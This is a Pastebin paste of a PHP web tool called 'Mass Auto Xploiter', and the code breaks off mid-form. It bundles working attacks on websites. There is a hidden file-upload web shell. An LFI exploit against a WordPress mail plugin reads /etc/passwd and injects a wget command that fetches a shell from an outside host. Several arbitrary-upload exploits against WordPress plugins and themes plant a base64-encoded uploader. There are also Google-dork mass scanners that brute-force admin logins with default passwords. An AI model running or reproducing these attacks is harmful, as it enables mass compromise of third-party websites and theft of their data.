Ribang

Mini Mass Auto Xploiter Only Tools v1.0

Feb 1st, 2018
655
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 45.04 KB | None | 0 0
  1. <!DOCTYPE html><html><head><meta charset="UTF-8">
  2. <title>Mini Mass Auto Xploiter Only Tools v1.0</title>
  3. <?php
  4. /// This is Juste a [Zip] Off Tools Don't Change Right Noob
  5.  
  6. /// Mass Auto Xploiter Only Tools v1.014 Tool
  7. /// Created By Mister Klio
  8. /// Mail : [email protected]
  9. /// Fb : www.fb.com/IzzAdiine
  10.  
  11. ?>
  12. <style>
  13. @import url(https://fonts.googleapis.com/css?family=Berlin%20Sans%20FB);
  14. body {
  15. font-family: 'Berlin Sans FB', Arial, sans-serif;
  16. background: #383838;color: white;
  17. font-size:15px;}span {color: #404040;font-size:15px;
  18. }
  19. span,b,font,a {
  20. font-size:15px;
  21. }
  22. .header-izz {
  23. -webkit-box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.2), 0 0 6px rgba(0, 0, 0, 0.4);
  24. box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.2), 0 0 6px rgba(0, 0, 0, 0.4);
  25. margin: 20px 0;
  26. background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));
  27. background:-webkit-linear-gradient(top, #505050, #383838);
  28. background:linear-gradient(to bottom, #505050, #383838);
  29. background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;
  30. width: 400px;position: relative;border-radius: 20px;padding: 20px;color: white;
  31. }
  32. .button {
  33. background: #0078FF; color: white; text-align: center; padding: 12px; text-decoration: none;
  34. border-radius: 1px; border-radius:5px;margin:0 auto; border:1px solid #4D4D4D;
  35. }
  36. input {margin: 0;
  37. -webkit-box-sizing: border-box;width:90%;
  38. }
  39. .checkout-input {
  40. font-family: 'Berlin Sans FB', Arial, sans-serif;
  41. margin: 0;
  42. padding:2px;
  43. height: 32px;
  44. width:90%;
  45. color: #FFFFFF;
  46. background: #383838;
  47. border :0px;
  48. border-radius:5px;
  49. -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 1px rgba(255, 255, 255, 0.5);
  50. box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 1px rgba(255, 255, 255, 0.5);
  51. }
  52.  
  53. a {text-decoration:none; font-family: 'Berlin Sans FB', Arial, sans-serif;color:#FFFFFF;}
  54. a:hover {text-decoration:none;color:#fffffff;background:#0078FF;
  55. }
  56. .Izz {
  57. background: #0078FF;
  58. border-radius: 20px;
  59. padding: 10px;
  60. }
  61. </style>
  62. <?
  63. /// Hide Really File Upload
  64. if ($_GET['Hide'] == 'Upload') {
  65. echo "<center><a Style='font-size:30px;'><br>
  66. Upload Files </a></center><center><center><form method='post' enctype='multipart/form-data' >
  67. <input type='file' name='idx'><input type='submit' name='upload' value='upload' class='button'>
  68. </form>";
  69. if($_POST['upload']) {
  70. if(@copy($_FILES['idx']['tmp_name'], $_FILES['idx']['name'])) {
  71. echo "Done!";
  72. } else {
  73. echo "Sorry Mama No !";
  74. }
  75. }
  76. exit;
  77. }
  78. ?>
  79. <center>
  80. <?php
  81. //// Thsi Script Juste For Fun :v
  82. echo "<center><form action=' ' method='post' enctype='multipart/form-data' >
  83. <input type='file' ><input type='submit' name='Done' value='upload' class='button'>
  84. </form>";
  85. $Done = $_POST ['Done'];
  86. if ($Done){
  87. echo '<br> Fuck You Noob Are You A Really Hacker ??? Fuck Kill me<br>';
  88. }
  89. ?></center>
  90. <br><center><a Style='font-size:30px;'>Mass Auto Xploiter Only Tools v1.0</b></center>
  91. <center><a Style='font-size:15px;'>Created By Mister Klio [MK] </a></center>
  92. <center><a Style='font-size:15px;'>www.Facebook.com/MrKlio </a></center>
  93. <? echo "".php_uname()."<br>"; ?>
  94. <center><a Style='font-size:15px;'>Copyright 2017 All Right Reserved </a></center>
  95. <?
  96. //// Mister klio Only Tools v1.0
  97. ?>
  98. <br><br>
  99. <center>
  100. <a class='Izz' href='?Home=Done!' style='background:#2270ff;'>Home (Hide My Tools)</a>
  101. <a class='Izz' href='?Scanexploit=Done!' style='background:#2270ff;'>Cms Scanner Vuln Online</a>
  102. <a class='Izz' href='?Aksidownload=Done!' style='background:#2270ff;'>Auto Dorker Auto Upload Shell (Aksi download)</a>
  103. <a class='Izz' href='?adminweb=Done!' style='background:#2270ff;'>Admin Auto Get Login (Ajax Google Dorker)</a>
  104. <? ////// ?><br><br><br>
  105. <a class='Izz' href='?Udesign=Done!' style='background:#2270ff;'>Wp Theme U-design (Uploadify</a>
  106. <a class='Izz' href='?single-upload=Done!' style='background:#2270ff;'>Wp Plugins tevolution (Single Upload)</a>
  107. <a class='Izz' href='?Upload=Done!' style='background:#2270ff;'>Xploit Upload Files (All Url Vuln)</a>
  108. <a class='Izz' href='?uploadimages=Done!' style='background:#2270ff;'>Modules Upload Files (uploadimages)</a>
  109. <? ////// ?><br><br><br>
  110. <a class='Izz' href='?download=Done!' style='background:#2270ff;'>Wp Auto Get Db (LFI) </a>
  111. <a class='Izz' href='?forcedownload=Done!' style='background:#2270ff;'>WP Get Database [Forcedownload]</a>
  112. <a class='Izz' href='?mail-masta=Done!' style='background:#2270ff;'> 1 - Wordpress Auto Get DataBase (AFD)</a>
  113. <a class='Izz' href='?PluginMail=Done!' style='background:#2270ff;'> 2 - WordPress Plugin Mailmasta (LFI)</a>
  114. <? ////// ?><br><br><br>
  115. <a class='Izz' href='?jqueryDownload=Done!' style='background:#2270ff;'>Jquery File Upload (uploader )</a>
  116. <a class='Izz' href='?CatproManage=Done!' style='background:#2270ff;'>Wordpress Catpro Gallery (AFU)</a>
  117. <a class='Izz' href='?Finder=Done!' style='background:#2270ff;'>Finder Admin V2.0</a>
  118. <? ////// ?>
  119.  
  120. <? ////// ?><br><br>
  121.  
  122. <?php
  123. if ($_GET['Scanexploit'] == 'Done!') {
  124. ?>
  125. <?php
  126.  
  127. @set_time_limit(0);
  128. @error_reporting(0);
  129.  
  130. // Script Functions , start ..!
  131.  
  132. function ask_exploit_db($component){
  133.  
  134. $exploitdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
  135.  
  136. $result = @file_get_contents($exploitdb);
  137.  
  138. if (eregi("No results",$result)) {
  139.  
  140. echo"<td>Not Found</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>";
  141.  
  142. }else{
  143.  
  144. echo"<td><a href='$exploitdb'>Found ..!</a></td><td><--</td></tr>";
  145.  
  146. }
  147. }
  148.  
  149. /**************************************************************/
  150. /* Joomla Conf */
  151.  
  152. function get_components($site){
  153.  
  154. $source = @file_get_contents($site);
  155.  
  156. preg_match_all('{option,(.*?)/}i',$source,$f);
  157. preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
  158. preg_match_all('{/components/(.*?)/}i',$source,$f3);
  159.  
  160. $arz=array_merge($f2[1],$f[1],$f3[1]);
  161.  
  162. $coms=array();
  163.  
  164. if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
  165.  
  166. foreach(array_unique($arz) as $x){
  167.  
  168. $coms[]=$x;
  169. }
  170.  
  171. foreach($coms as $comm){
  172.  
  173. echo "<tr><td>$comm</td>";
  174.  
  175. ask_exploit_db($comm);
  176.  
  177. }
  178.  
  179. }
  180.  
  181. /**************************************************************/
  182. /* WP Conf */
  183.  
  184. function get_plugins($site){
  185.  
  186. $source = @file_get_contents($site);
  187.  
  188. preg_match_all("#/plugins/(.*?)/#i", $source, $f);
  189.  
  190. $plugins=array_unique($f[1]);
  191.  
  192. if(count($plugins)==0){ echo "<tr><td colspan=1>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
  193.  
  194. foreach($plugins as $plugin){
  195.  
  196. echo "<tr><td>$plugin</td>";
  197.  
  198. ask_exploit_db($plugin);
  199.  
  200. }
  201.  
  202. }
  203.  
  204. /**************************************************************/
  205. /* Nuke's Conf */
  206.  
  207. function get_numod($site){
  208.  
  209. $source = @file_get_contents($site);
  210.  
  211. preg_match_all('{?name=(.*?)/}i',$source,$f);
  212. preg_match_all('{?name=(.*?)(&amp;|&|l_op=")}i',$source,$f2);
  213. preg_match_all('{/modules/(.*?)/}i',$source,$f3);
  214.  
  215. $arz=array_merge($f2[1],$f[1],$f3[1]);
  216.  
  217. $coms=array();
  218.  
  219. if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
  220.  
  221. foreach(array_unique($arz) as $x){
  222.  
  223. $coms[]=$x;
  224. }
  225.  
  226. foreach($coms as $nmod){
  227.  
  228. echo "<tr><td>$nmod</td>";
  229.  
  230. ask_exploit_db($nmod);
  231.  
  232. }
  233.  
  234. }
  235.  
  236. /*****************************************************/
  237. /* Xoops Conf */
  238.  
  239. function get_xoomod($site){
  240.  
  241. $source = @file_get_contents($site);
  242.  
  243. preg_match_all('{/modules/(.*?)/}i',$source,$f);
  244.  
  245. $arz=array_merge($f[1]);
  246.  
  247. $coms=array();
  248.  
  249. if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
  250.  
  251. foreach(array_unique($arz) as $x){
  252.  
  253. $coms[]=$x;
  254. }
  255.  
  256. foreach($coms as $xmod){
  257.  
  258. echo "<tr><td>$xmod</td>";
  259.  
  260. ask_exploit_db($xmod);
  261.  
  262. }
  263.  
  264. }
  265.  
  266. /**************************************************************/
  267. /* Header */
  268. function t_header($site){
  269.  
  270. ?>
  271.  
  272. <?
  273. echo'<table align="center" border="1" width="50%" cellspacing="1" cellpadding="5">';
  274.  
  275. echo'
  276. <tr>
  277. <td>Site : <a href="'.$site.'">'.$site.'</a></td>
  278. <td>Exploit-db</b></td>
  279. <td>Exploit it !</td>
  280. </tr>
  281. ';
  282.  
  283. }
  284.  
  285. ?>
  286. <center><a Style='font-size:30px;'><br>
  287. Cms Scanner Vuln Online</a></center><center>
  288. <br>
  289. <form method="POST" action="" class='header-izz'>
  290. <p align="center"><input type="text" name="site" value="http://www.target.mu/" class='checkout-input'>
  291. <br><br>
  292. <select name="what">
  293. <option>Wordpress</option>
  294. <option>Joomla</option>
  295. <option>Nuke's</option>
  296. <option>Xoops</option>
  297.  
  298. </select><br><br><input type="submit" value="Get Xploit" class='button'></p>
  299. </form>
  300. <?
  301.  
  302. // Start Scan :P :P ...
  303.  
  304. if($_POST){
  305.  
  306. $site=strip_tags(trim($_POST['site']));
  307.  
  308. t_header($site);
  309.  
  310. echo $x01 = ($_POST['what']=="Wordpress") ? get_plugins($site):"";
  311. echo $x02 = ($_POST['what']=="Joomla") ? get_components($site):"";
  312. echo $x03 = ($_POST['what']=="Nuke's") ? get_numod($site):"";
  313. echo $x04 = ($_POST['what']=="Xoops") ? get_xoomod($site):"";
  314.  
  315. }
  316. exit;
  317. }
  318. ?>
  319. </table>
  320. <?php
  321. if ($_GET['PluginMail'] == 'Done!') {
  322. ?>
  323. <br><center><a Style='font-size:30px;'>
  324. WordPress Plugin Mailmasta (LFI)</a></center><center>
  325. <br>
  326. Dork : /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php <br>
  327. Dork : /plugins/mail-masta/inc/campaign/ <br>
  328. <form method='post' class='header-izz'>
  329. Target:<br><br> <input type="text" size="60" name="lfiurl" value="http://target.com" style='width: 350px;' class='checkout-input'> <br><br>
  330. <input type="submit" value="Done!" class='button'>
  331. </form>
  332. <?php
  333. if($_POST['lfiurl']) {
  334. print "<pre>";
  335. $target = $_POST['lfiurl'];
  336. $testlfi = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd%00";
  337. $readenv = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/proc/self/environ%00";
  338. $mbooh = preg_split("/.php/", $target);
  339. $pecah = preg_split("/\//", $mbooh[0]);
  340. $path = "/";
  341. $azz = count($pecah) - 1;
  342. for($g = 3; $g<$azz;$g++) {
  343. $path.= $pecah[$g]."/";
  344. }
  345. $bug = $pecah[$azz].".php".$mbooh[1];
  346. $host = $pecah[2];
  347. print "[+] Testing LFI ... ";
  348. flush();
  349. $res = FetchURL($target.$testlfi);
  350. if(preg_match("/root:x:0:0/", $res)) {
  351. print "<font color='green'>Ok</font><br>[+] Reading /proc/self/environ ... ";
  352. flush();
  353. $rez = FetchURL($target.$readenv);
  354. if(preg_match("/DOCUMENT_ROOT=/", $rez)) {
  355. print "<font color='green'>Ok</font><br>[+] Exploiting target ... <br>";
  356. flush();
  357. $cmd = "<?php system('wget -O up.php www.wget.yu.tl/files/uploader.css');?>";
  358. $soket = fsockopen($host, 80);
  359. $req = "GET ".$path.$bug.$readenv." HTTP/1.0\r\nHost: ".$host."\r\nAccept: */*\r\nUser-Agent: ".$cmd."\r\n\r\n";
  360. fputs($soket, $req);
  361. fclose($soket);
  362. flush();
  363. $cek = FetchURL("http://".$host.$path."up.php");
  364. if(preg_match("#SilverHood#i", $cek)) {
  365. print "[+] Exploit successful!<br>[+] Shell uploader to <font color='green'>http://".$host.$path."up.php</font>";
  366. } else {
  367. print "<font color='red'>[!] Exploit failed!</font><br>";
  368. }
  369. }
  370. else {
  371. print "<font color='red'>Failed</font><br>";
  372. }
  373. } else {
  374. print "<font color='red'>Failed</font><br>";
  375. }
  376. }
  377. function FetchURL($url) {
  378. $ch = curl_init();
  379. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)");
  380. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  381. curl_setopt($ch, CURLOPT_HEADER, 1);
  382. curl_setopt($ch, CURLOPT_URL, $url);
  383. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  384. curl_setopt($ch, CURLOPT_TIMEOUT, 30);
  385. $data = curl_exec($ch);
  386. if(!$data) {
  387. return false;
  388. }
  389. return $data;
  390. }
  391. exit;
  392. }
  393. ?>
  394. <?
  395. if ($_GET['CatproManage'] == 'Done!') {
  396. ?>
  397. <?php
  398. @session_start();
  399. @error_reporting(0);
  400. @ini_set('error_log',NULL);
  401. @ini_set('log_errors',0);
  402. @ini_set('display_errors', 0);
  403. @set_time_limit(0);
  404. /*
  405. Name app : Wordpress Catpro Gallery (AFU)
  406. Author / Editor Script : MKs CYBERSERKERS
  407. */
  408.  
  409. ?><br><center><a Style='font-size:30px;color:#ededed;'>Wordpress Catpro Gallery (AFU)</a></center><center>
  410. Dork : /wp-admin/admin.php?page=catpro_manage <br>
  411. <form method='post' class='header-izz'>
  412. Domain: <br>Mk.php.xxxjpg<br><br>
  413. <textarea placeholder='http://www.target.com/' name='url' style='width: 350px;' class='checkout-input'></textarea><br><br>
  414. <input type='submit' name='MK' value='Done!' class='button'>
  415. </form>
  416.  
  417. <?php
  418. $site = $_POST['url'];
  419. if($_POST['MK']) {
  420. echo "<br> Target : ".$site."<br>";
  421. $post = array(
  422. "task" => "cpr_add_new_album",
  423. "album_name" => "MKs",
  424. "album_desc" => "MKs",
  425. "album_img" => "@Mk.php.xxxjpg",
  426. );
  427. $ch = curl_init ("$site/wp-admin/admin.php?page=catpro_manage");
  428. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  429. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  430. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  431. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
  432. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  433. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  434. curl_setopt ($ch, CURLOPT_POST, 1);
  435. @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  436. $data = curl_exec ($ch);
  437. curl_close ($ch);
  438. }
  439. exit;
  440. }
  441. ?>
  442. <?
  443. if ($_GET['jqueryDownload'] == 'Done!') {
  444. ?>
  445. <br><center><a Style='font-size:30px;color:#ededed;'>Jquery File Upload (uploader )</a></center><center>
  446. Dork : /assets/global/plugins/jquery-file-upload/server/php/ <br>
  447. <form method="post" action="" enctype="multipart/form-data" class='header-izz'>
  448. Name Shell Upload : <br><br><input type="text" name="go" value="Mk.php.xxxjpg" style='width: 350px;' class='checkout-input'><br><br>
  449. Target :<br><br>
  450. <textarea placeholder="http://www.target.com/" name="sites" style='width: 350px;' class='checkout-input'></textarea><br><br>
  451. <input type="submit" name="go" value="Xploit!" class='button'>
  452. </form>
  453. <?php
  454. $site = explode("\r\n", $_POST['sites']);
  455. $go = $_POST['go'];
  456. if($go) {
  457. foreach($site as $sites) {
  458.  
  459. $uploader = 'Mk.php.xxxjpg';
  460.  
  461. $ch = curl_init("{$sites}/assets/global/plugins/jquery-file-upload/server/php/");
  462. curl_setopt($ch, CURLOPT_POST, 1);
  463. curl_setopt($ch, CURLOPT_POSTFIELDS,
  464. array('files[]'=>"@$uploader"));
  465. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  466. $postResult = curl_exec($ch);
  467. curl_close($ch);
  468. if(preg_match("/url|deleteUrl|deleteType/", $postResult)) {
  469. preg_match('/"url":"(.*?)"/', $postResult, $get);
  470. $loc = $get[1];
  471. echo "URL : <font color=green>$sites</font><br>";
  472. echo "Status : Successfully Xploited!<br>";
  473. echo "File : <a href='$loc' target='_blank'><font color=green>$loc</font></a><br>";
  474. }else {
  475. echo 'Not Upload';
  476. }
  477. }
  478. }
  479. exit;
  480. }
  481. ?>
  482. <?
  483. if ($_GET['Aksidownload'] == 'Done!') {
  484. ?>
  485. <br><center><a Style='font-size:30px;color:#ededed;'>Auto Dorker Auto Upload Shell (Aksi download)</a></center><center>
  486. Dork : /adminweb/modul/mod_download/aksi_download.php <br>
  487. <form method="post" class='header-izz'>
  488. <form method="post">
  489. Dork: <br><br><input type="text" name="dork" value="inurl:/semua-berita.html" size="50" style='width: 350px;' class='checkout-input'><br><br>
  490. <input type="submit" value="scan" class='button'>
  491. </form>
  492. <?php
  493.  
  494. class MK {
  495. public $dork;
  496. public function google($dork, $page) {
  497. $kunAPI = "AIzaSyDYG1FME1N7meBZLcywY7VojMHmtUAUIzY";
  498. $dork = urlencode($dork);
  499. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz=8&q={$dork}&key=$kunAPI&start={$page}";
  500. $output = json_decode($this->http_getx($url, true), true);
  501. if($output) {
  502. return $output;
  503. } else {
  504. return false;
  505. }
  506. }
  507. public function http_getx($url, $safemode = false) {
  508. if($safemode === true) sleep(1);
  509. $im = curl_init($url);
  510. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  511. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  512. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  513. curl_setopt($im, CURLOPT_HEADER, 0);
  514. return curl_exec($im);
  515. curl_close();
  516. }
  517. public function buffer() {
  518. ob_flush();
  519. flush();
  520. }
  521. public function exploit($url,$payload) {
  522. $ch = curl_init($url);
  523. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  524. curl_setopt($ch, CURLOPT_POST, true);
  525. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  526. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  527. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  528. curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  529. $res = curl_exec($ch);
  530. curl_close($ch);
  531. return $res;
  532. }
  533. }
  534. $dorker = new MK;
  535. $dork = $dorker->dork = $_POST['dork'];
  536. if(isset($dork)) {
  537. $data = $dorker->google($dork, "0");
  538. $dorker->buffer();
  539. if($data) {
  540. foreach($data['responseData']['cursor']['pages'] as $key => $data_page) {
  541. $data = $dorker->google($dork, $data_page['start']);
  542. foreach($data['responseData']['results'] as $key => $load_data) {
  543. if($_SESSION[$load_data['visibleUrl']]) {
  544. } else {
  545. $_SESSION[$load_data['visibleUrl']] = "1";
  546. $url = "http://".$load_data['visibleUrl']."/";
  547. $up = array(
  548. "admin" => "admin",
  549. "admin" => "123456",
  550. "admin" => "admin123456",
  551. "admin" => "tolol",
  552. "admin" => "administrator",
  553. "MK" => "MK",
  554. );
  555. foreach($up as $user => $pass) {
  556. $data1 = array("username" => $user, "password" => $pass,);
  557. $anu = $dorker->exploit($url.'/adminweb/cek_login.php', $data1);
  558. if(preg_match("/Logout|Administrator/i", $anu)) {
  559. $file = "shellmu.php"; // ubah shellmu.php jadi nama file shellmu 1 dir dengan exploit ini
  560. $data2 = array("judul" => "MK", "fupload" => "@$file", "upload" => " &nbsp;&nbsp;&nbsp;&nbsp; Simpan &nbsp;&nbsp;&nbsp;&nbsp;");
  561. $anu2 = $dorker->exploit($url.'/adminweb/modul/mod_download/aksi_download.php?module=download&act=input', $data2);
  562. if(preg_match("/MK/", $anu2)) {
  563. $cek = $dorker->http_getx("$url/files/shellmu.php");
  564. if(preg_match("/Upload|MySQL|SMTP Grabber/i", $cek)) {
  565. echo "<a href='$url/files/shellmu.php' target='_blank'>$url/files/shellmu.php</a><br>";
  566. }
  567. }
  568. }
  569. }
  570. $dorker->buffer();
  571. }
  572. }
  573. }
  574. $dorker->buffer();
  575. } else {
  576. echo "google captcha.";
  577. }
  578. }
  579. exit;
  580. }
  581. ?>
  582. <?
  583. if ($_GET['adminweb'] == 'Done!') {
  584. ?>
  585. <br><center><a Style='font-size:30px;color:#ededed;'>Admin Auto Get Login (Ajax Google Dorker)</a></center><center>
  586. Dork : inurl:/semua-berita.html <br>
  587. <form method="post" class='header-izz'>
  588. Dork : <br><br><input type="text" name="dork" value="inurl:/semua-berita.html" size="50" style='width: 350px;' class='checkout-input'><br><br>
  589. <input type="submit" value="scan" class='button'>
  590. </form>
  591. <?php
  592. class MK {
  593. public $dork;
  594. public function google($dork, $page) {
  595. $kunAPI = "AIzaSyDYG1FME1N7meBZLcywY7VojMHmtUAUIzY";
  596. $dork = urlencode($dork);
  597. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz=8&q={$dork}&key=$kunAPI&start={$page}";
  598. $output = json_decode($this->http_getx($url, true), true);
  599. if($output) {
  600. return $output;
  601. } else {
  602. return false;
  603. }
  604. }
  605. public function http_getx($url, $safemode = false) {
  606. if($safemode === true) sleep(1);
  607. $im = curl_init($url);
  608. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  609. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  610. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  611. curl_setopt($im, CURLOPT_HEADER, 0);
  612. return curl_exec($im);
  613. curl_close();
  614. }
  615. public function buffer() {
  616. ob_flush();
  617. flush();
  618. }
  619. public function exploit($url,$payload) {
  620. $ch = curl_init($url);
  621. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  622. curl_setopt($ch, CURLOPT_POST, true);
  623. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  624. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  625. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  626. curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  627. $res = curl_exec($ch);
  628. curl_close($ch);
  629. return $res;
  630. }
  631. }
  632. $dorker = new MK;
  633. $dork = $dorker->dork = $_POST['dork'];
  634. if(isset($dork)) {
  635. $data = $dorker->google($dork, "0");
  636. $dorker->buffer();
  637. if($data) {
  638. foreach($data['responseData']['cursor']['pages'] as $key => $data_page) {
  639. $data = $dorker->google($dork, $data_page['start']);
  640. foreach($data['responseData']['results'] as $key => $load_data) {
  641. if($_SESSION[$load_data['visibleUrl']]) {
  642. } else {
  643. $_SESSION[$load_data['visibleUrl']] = "1";
  644. $url = "http://".$load_data['visibleUrl']."/";
  645. $up = array(
  646. "admin" => "admin",
  647. "MK" => "MK",
  648. "admin" => "123456",
  649. "admin" => "admin123456",
  650. "admin" => "tolol",
  651. "admin" => "administrator",
  652. );
  653. foreach($up as $user => $pass) {
  654. if($_SESSION[$user] && $_SESSION[$pass]) {
  655. } else {
  656. $_SESSION[$user] = "1";
  657. $_SESSION[$pass] = "1";
  658. $data = array(
  659. "username" => $user,
  660. "password" => $pass,
  661. "Submt" => "Submit",
  662. );
  663. $anu = $dorker->exploit($url.'/adminweb/cek_login.php', $data);
  664. if(preg_match("/Logout|Selamat Datang di Halaman Administrator/i", $anu)) {
  665. echo "<a href='$url/adminweb/' target='_blank'>$url</a> -> sukses login [$user:$pass]<br>";
  666. } else {
  667. echo "$url -> gagal login.<br>";
  668. }
  669. }
  670. $dorker->buffer();
  671. }
  672. }
  673. }
  674. }
  675. $dorker->buffer();
  676. } else {
  677. echo "google captcha.";
  678. }
  679. }
  680. exit;
  681. }
  682. ?>
  683. <?
  684. if ($_GET['Udesign'] == 'Done!') {
  685. ?>
  686. <br><center><a Style='font-size:30px;color:#ededed;'> Wp Theme U-design (Uploadify)</a></center><center>
  687. Dork : /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php <br>
  688. <center>
  689. <form method="post" enctype="multipart/form-data" class='header-izz'>
  690. Shellname : <br><br><input type="text" name='filename' value='Mk.php.xxxjpg' style='width: 350px; height:20px;' class='checkout-input'><br>
  691. Target: <br><br><textarea name="url" placeholder="http://www.target.com/" style='width: 350px; height:50px;' class='checkout-input'></textarea><br><br>
  692. <input type='submit' name='exp' value='Done!' class='button'>
  693. </form>
  694. <?php
  695.  
  696. set_time_limit(0);
  697. error_reporting(0);
  698.  
  699. function buffer() {
  700. ob_flush();
  701. flush();
  702. }
  703. function curl($url, $payload) {
  704. $ch = curl_init();
  705. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  706. curl_setopt($ch, CURLOPT_URL, $url);
  707. curl_setopt($ch, CURLOPT_POST, true);
  708. curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  709. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  710. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  711. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  712. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  713. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  714. curl_setopt($ch, CURLOPT_HEADER, 0);
  715. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  716. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  717. $res = curl_exec($ch);
  718. curl_close($ch);
  719. return $res;
  720. }
  721. function cek($url) {
  722. $ch = curl_init();
  723. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  724. curl_setopt($ch, CURLOPT_URL, $url);
  725. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  726. $res = curl_exec($ch);
  727. curl_close($ch);
  728. return $res;
  729. }
  730. $file = htmlspecialchars($_POST['filename']);
  731. $site = explode("\r\n", $_POST['url']);
  732. $do = $_POST['exp'];
  733. $uploader = base64_decode("PD9waHANCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
  734. if($do) {
  735. $idx_dir = mkdir("Mk_only", 0755);
  736. $shell = "Mk_only/".$file;
  737. $fopen = fopen($shell, "w");
  738. fwrite($fopen, $uploader);
  739. fclose($fopen);
  740. foreach($site as $url) {
  741. $target = $url.'/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php';
  742. $data = array(
  743. "Filedata" => "@$shell"
  744. );
  745. $curl = curl($target, $data);
  746. if($curl) {
  747. $cek = cek($url.'/'.$file);
  748. if(preg_match("/MK/i", $cek)) {
  749. echo "<a href='$url/$file' target='_blank'>$url/$file</a> -> shellmu<br>";
  750. }
  751. }
  752. buffer();
  753. }
  754. }
  755. exit;
  756. }
  757. ?>
  758. <?
  759. if ($_GET['single-upload'] == 'Done!') {
  760. ?>
  761. <br><center><a Style='font-size:30px;color:#ededed;'> Wp Plugins tevolution (Single Upload)</a></center><center>
  762. Dork : /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php <br>
  763. <center>
  764. <form method="post" enctype="multipart/form-data" class='header-izz'>
  765. Shellname Mk.php.xxxjpg : <br><br><input type="text" name='filename' value='Mk.php.xxxjpg' required style='width: 350px; height:20px;' class='checkout-input'><br>
  766. Target: <br><br><textarea name="url" placeholder="http://www.target.com/" style='width: 350px; height:50px;' class='checkout-input'></textarea><br><br>
